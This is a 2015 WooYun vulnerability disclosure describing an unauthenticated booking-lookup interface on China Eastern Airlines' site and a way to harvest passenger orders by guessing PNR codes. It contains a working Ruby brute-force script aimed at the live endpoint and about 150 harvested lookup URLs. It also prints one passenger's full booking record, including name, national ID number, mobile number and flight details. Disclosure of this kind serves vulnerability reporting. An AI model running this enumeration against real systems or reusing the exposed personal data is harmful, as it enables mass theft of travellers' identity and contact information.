当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100000

漏洞标题:东方航空某接口未授权访问及PNR码与客票号码设计缺陷可导致大量航空订单信息泄漏(含姓名 航班 目的地 身份证号 手机号等)

相关厂商:中国东方航空股份有限公司

漏洞作者: 北京方便面

提交时间:2015-03-07 13:50

修复时间:2015-04-21 13:52

公开时间:2015-04-21 13:52

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-07: 细节已通知厂商并且等待厂商处理中
2015-03-07: 厂商已经确认,细节仅向厂商公开
2015-03-17: 细节向核心白帽子及相关领域专家公开
2015-03-27: 细节向普通白帽子公开
2015-04-06: 细节向实习白帽子公开
2015-04-21: 细节向公众公开

简要描述:

PNR是旅客订座记录,即Passenger Name Record的缩写,它反映了旅客的航程,航班座位占用的数量,及旅客信息。适用民航订座系统。
该接口多家航空公司适用 海南航空、联合航空、上海航空等等
包含姓名 航班 目的地 身份证号 手机号等信息
提供大量未起飞订单信息证明

详细说明:

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCXV83
该接口可未授权访问
PNR码由大于等于5 小于等于10的数字字母随机组成
为较为常见的为6位数字字母组成
而由于机票的基数还是相当大的 我们采用碰撞方式还是能获取大量PNR码的
有了PNR码 我们就可以查看他人的订票信息
例如:

1.张婧萌 MFJDWN
 2.  KN5927 V   SA21MAR  NAYXMN RR1   0710 0955      E --T4
 3.T SHA/SHA/T-021-34064880-454360/SHA HUA CHENG SOUTHWEST TRA
 4.T SHA/VEL/SHAO/JI HONG
 5.SSR FOID KN HK1 NI110108201111068247/P1
 6.SSR TKNE KN HK1 NAYXMN 5927 V21MAR 7818581172025/1/P1
 7.SSR CHLD KN HK1 06NOV11/P1
 8.OSI CA CTC 021-51069999X454360
 9.OSI KN CTCT18918086637
10.OSI CA TKNA TICTKED
11.PEK1E/JQ2DJ8/SHA717


这里包含了姓名 航班 身份证号 手机号等个人信息
附脚本:

# encoding: utf-8
require "rubygems"
require 'net/http'
require 'open-uri'
def makefile(file,string)
  directory = "#{Dir.pwd}"
  FileUtils.mkdir(directory)  unless File.directory?(directory)
  f = File.open("#{directory}/#{file}","a")
  f.puts string
  f.close
end  
def get_url(url)
	params = {}  
    params["name"] = 'Tom'  
	url = URI.parse(url)
	http      = Net::HTTP.new(url.host, url.port)
	resp      = http.get(url)	
end
threads=[]
    20.times {
    threads << Thread.new{
	10000000.times { |x|
		#puts x
		arr  = (0..9).to_a+('A'..'Z').to_a
        arr2 =('M'..'N').to_a
        pnr1 = arr2.sample(1).join("")
		pnr2  = arr.sample(5).join("")
		#pnr='MTDFEM'
        pnr=pnr1+pnr2
		#pnr= 'NGSR2E'
		#url = "http://scb2b.travelsky.com/scetb2b/b2b/orderquery/pnrdisplay.jsp?pnrno=#{pnr}"
		url = "http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=#{pnr}"
		puts pnr
		resp = get_url(url)
		#puts resp.code
		response = resp.body.force_encoding('UTF-8')
		#response = resp.body.force_encoding('gb2312')
		if response =~ /CTC/
		  puts url
		  makefile("log.txt",url)
		end 
		}
		}
}
  threads.each{|t| t.join}


电子票号:
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=2&queryText=784-2168259211
电子票号可遍历

漏洞证明:

http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTDFEM
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJSGQ5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML8X9B
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWQYJ4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEHYG1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME6WFM
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MY8XTK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NT8MFX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCXV83
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ0LPQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT958B
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NF3BQN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15R7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFJDWN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZTHPX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY7JHV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBE5DT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCX275
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15S7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML0926
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NT7ZJD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE315G
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK5RFY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZM64E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME8T06
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MHPMZ9
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NV0XM1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MDV6N7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MD3Z26
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MYF63Q
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXMJGD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXEGC7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXCM1E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWF5NL
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJD6H4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NG2SCZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ8YWG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NDB7GV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJYWDN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MLS4PQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZK6FN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT46QL
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFVRNK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJP0ZB
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBP8LJ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ51YW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MWH7KS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVNQJT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBTYLP
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKC6Z8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME8ZB9
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NEDPRZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVL9JF
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MG9XWT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLSF96
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTZV04
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZPE9T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MX3Z7W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBW7HR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MC89MS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MDHX5T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJP81X
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGVXW6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZWSR2
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTX1RV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKCVN6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MG2E3W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NVNG3J
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXNJTW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE7R1L
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NWF3XC
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZCM08
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK19HR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB74GE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK69CD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTR4SV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NC84Y2
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJLH21
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NHXJGR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MX6FL5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZY7QR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NHKY2E
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB68L1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MKW016
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEC9PR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCV5F8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGENV4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGK2R3
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NV6PDZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZW6JD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MW8PSG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLVJDT
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NL3Z78
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MFPDRQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NVL5Q3
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ906D
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZJ37C
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGWQ5Z
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLECJK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MEGHCD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVYFZ5
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MW5871
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT09QG
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NB3DXQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MGWX7V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJEZQS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBE6NX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZ2KYN
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MBGR4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ML0FZ7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJQCS6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NFH0JS
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NYE8CQ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZQWX6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME3281
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ND1R8W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBK43V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NCP32H
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY3E7K
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTVJMY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NH3VGR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NKZP30
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJEWT6
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVWNT7
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZL6E4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXMHFD
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MB7NSW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVLF3P
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NGBJ6N
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCBYGX
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NB1L4F
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXRYWK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NY1BEK
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NXLGB1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTQXYE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBYR8V
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NLZPSE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJLSEY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NTQR6H
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBQVER
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NK7BJW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCND4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MZVQN4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NBYZET
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NH0F16
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MCHV6Q
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NW59RV
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MK8LVY
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NJF3N4
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MKM84T
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MTDWF8
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVNS4W
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=ME4RN1
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MVR5JE
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJ69HZ
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MK1ZQR
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MLCR20
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MHD1TW
http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MJZ0NT


屏幕快照 2015-03-07 下午1.10.34.png


屏幕快照 2015-03-07 下午12.59.46.png


屏幕快照 2015-03-07 下午1.00.00.png


屏幕快照 2015-03-07 下午1.00.08.png


屏幕快照 2015-03-07 下午1.00.19.png


屏幕快照 2015-03-07 下午1.00.26.png


屏幕快照 2015-03-07 下午1.00.40.png


http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=MT958B

屏幕快照 2015-03-07 下午1.02.18.png


http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NZ0LPQ

屏幕快照 2015-03-07 下午1.02.55.png


http://www.ceair.com/back/ticket/ticket-search!queryOrderTikDirect.shtml?radio=1&queryText=NE15R7

屏幕快照 2015-03-07 下午1.03.49.png

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-07 22:02

厂商回复:

十分感谢

最新状态:

暂无